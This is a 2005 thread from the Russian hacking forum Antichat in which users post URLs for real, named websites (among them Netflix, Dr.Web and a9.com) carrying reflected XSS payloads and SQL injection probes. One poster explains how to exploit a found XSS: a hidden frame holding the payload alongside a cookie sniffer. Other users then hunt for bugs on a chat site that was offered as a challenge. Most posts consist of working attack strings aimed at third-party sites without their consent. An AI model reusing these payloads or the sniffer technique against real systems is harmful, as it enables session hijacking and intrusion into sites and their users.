HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 21.11.2005, 01:52
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию

http://www.wargames.ru/search.php?query=%27
http://www.ccg.ru/sections.php?op=listarticles&secid=285'
http://www.rolemancer.ru/search.php?query=%27
http://rulezzz.dp.ua/fotos/<script>alert()</script>
http://listsoft.ru/search.php?q=%27%...me=yes&tip=yes
http://opengl.net/ поиск "style=background:url(javascript:alert());"
http://www.eurochat.ru/?go=gal&page=7"><script>alert()</script>
http://www.netflix.com/MovieDisplay?movieid=70011207<script>alert()</script>&trkid=135437
http://a9.com/-/search/imageResult?q=666&t=f1263.jpg&ru="style=background :url(javascript:alert(1));&u="style=background:url (javascript:alert(2));&ih=296&iw=425&th=84&tw=122& id=I-RBtbW0cGoJ
 

  #32  
Старый 21.11.2005, 19:43
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
С нами: 10840706

Репутация: 547


По умолчанию

k1b0rg

Вопрос лично к тебе, я в нахождение багов новичок, вот нашёл тут одну вешь, может подскажеш как им воспользоватся ?

http://www.mix.az/engine/modules/imagepreview.php?image='
 

  #33  
Старый 21.11.2005, 20:47
k00p3r
Banned
Регистрация: 31.05.2005
Сообщений: 549
С нами: 11023586

Репутация: 16


По умолчанию

Ну и какая ж там бага? =)
 

  #34  
Старый 21.11.2005, 21:04
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию

вот бага
http://www.mix.az/engine/modules/imagepreview.php?image=');</script><script>alert()</script>
а как воспользоваться ,ищи в поиске "пассивные xss"
здесь описывать не буду, много, ды это прочитай а что непонятное спрашивай.
ОБНОВЛЕНИЕ
http://www.drweb.ru/buy/invoice/?computers=&period=1y&email=%22%3E%3Cscript%3Ealer t%281%29%3C%2Fscript%3E&phone=%22%3E%3Cscript%3Eal ert%282%29%3C%2Fscript%3E&j_address=%22%3E%3Cscrip t%3Ealert%283%29%3C%2Fscript%3E&m_address=%22%3E%3 Cscript%3Ealert%284%29%3C%2Fscript%3E&org=%22%3E%3 Cscript%3Ealert%285%29%3C%2Fscript%3E&kpp=%22%3E%3 Cscript%3Ealert(6)</script>&currency=RUR&act=finish&prodid=01-D
http://www.multitran.ru/c/m.exe?HL=2...3C%2Fscript%3E
http://bugs.php.net/report.php?in%5B...n%5Bactres%5D=
http://www.cafepress.com/cp/search/s...cfpt=&x=26&y=8
http://www.phpbbhacks.com/searchresults.php?version=2"><script>alert()</script>&query=666&search_type=1&Submit=Go
http://www.tstyle.ru/price/1001636'
http://xrout.org/index.php поиск "><script>alert()</script>
http://www.etegro.com/rus/?module=items&id=22'"&text=1"><script>alert()</script>

Последний раз редактировалось k1b0rg; 21.11.2005 в 21:07..
 

  #35  
Старый 21.11.2005, 22:17
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
С нами: 10840706

Репутация: 547


По умолчанию

Я искал, 3 часа но всё без успешно, нечего не нашёл, как юзать пасивный Xss. Может в аське поговорим ?
 

  #36  
Старый 21.11.2005, 22:31
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию

Цитата:
Я искал, 3 часа но всё без успешно, нечего не нашёл, как юзать пасивный Xss. Может в аське поговорим ?
на почитай
http://dante.net.ru/forum/printthread.php?t=225
а так общий вид сводиться к тому, что имеется допустим твоя страничка, ставишь на нее два фрейма, один скрытый, в него помещаешь xss пасивную и сниффер.
это я тебе на "пальцах объяснил"
 

  #37  
Старый 22.11.2005, 04:07
porter
Познающий
Регистрация: 01.03.2005
Сообщений: 80
С нами: 11154714

Репутация: 12
По умолчанию

k1b0rg глянь сайт www.superchat.ee
говорят что очень хорошо защищён)
 

  #38  
Старый 22.11.2005, 07:41
Morph
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
С нами: 11442626

Репутация: 429


По умолчанию

Раньше тоже бегал искал потом понял.

Вот тебе XSS на твоем чате
http://www.superchat.ee/cgi-bin/00/User.Info?<script>alert(/XSS/)</script>&info

Последний раз редактировалось Morph; 22.11.2005 в 07:49..
 

  #39  
Старый 22.11.2005, 13:36
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами: 10937126

Репутация: 1316


По умолчанию

http://www.superchat.ee/cgi-bin/gallery?cat=M&show="+style%3Dbackground:url(javasc ript:alert());"
вот тебе еще код
хаха, сделали защиту от =.
и ваще люди, когда вы говорите найдите мне уязвимость, то не надо потом кричать как ею воспользоваться!
 

  #40  
Старый 22.11.2005, 13:42
Бафун
Banned
Регистрация: 19.11.2005
Сообщений: 17
С нами: 10775846

Репутация: 1
По умолчанию

http://www.hackthissite.org

Найди мне багу здесь.

Последний раз редактировалось Бафун; 22.11.2005 в 13:54..
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Делаю простые сайты _Michael_ Freelance - О Работе 6 08.11.2005 17:04
Избранные сайты k00p3r Болталка 11 13.08.2005 20:30
Обещаю, более на порно сайты не заглядывать, если вы мне поможете. marusucka Болталка 22 17.01.2005 23:37



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.